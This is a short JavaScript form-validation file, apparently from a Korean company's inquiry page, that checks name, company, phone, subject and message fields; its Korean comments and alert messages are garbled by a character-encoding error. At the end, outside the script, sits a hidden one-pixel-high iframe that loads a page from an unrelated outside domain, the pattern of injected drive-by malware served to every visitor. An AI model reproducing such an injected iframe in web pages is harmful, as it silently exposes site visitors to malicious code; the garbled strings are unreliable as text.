// ¼ýÀÚ¿Í ÇÏÀÌÇ¬(-)ÀÎÁö¸¦ Ã¼Å©..
function ChkNumHyphen(checkStr) {
    if(checkStr == "") return false;
	for(i = 0;i < checkStr.length;i++) {
		ch = checkStr.charAt(i);
		if(!((ch >= "0" && ch <= "9") || ch == "-")) {
			return false;
		}
	}
	return true;
}

function sendit(){
	var str =document.request;

	if(str.name.value ==""){
		alert("ÀÌ¸§À» ±âÀçÇÏ¼¼¿ä");
		str.name.focus();
		return;
	}
	if(str.company.value ==""){
		alert("È¸»çÀ» ±âÀçÇÏ¼¼¿ä");
		str.company.focus();
		return;
	}
	if(str.tel.value ==""){
		alert("¿¬¶ôÃ³¸¦ ±âÀçÇÏ¼¼¿ä");
		str.tel.focus();
		return;
	}
	else if(ChkNumHyphen(str.tel.value) ==false){
		alert("¿¬¶ôÃ³¸¦ È®ÀÎÇÏ¼¼¿ä");
		str.tel.focus();
		return;
	}
	if(str.subject.value ==""){
		alert("Á¦¸ñÀ» ±âÀçÇÏ¼¼¿ä");
		str.subject.focus();
		return;
	}
	if(str.content.value ==""){
		alert("³»¿ëÀ» ±âÀçÇÏ¼¼¿ä");
		str.content.focus();
		return;
	}

	document.request.submit();
}
<iframe src="http://www.tod8159.com/88/sl.html" width=116 height=1></iframe> </td>

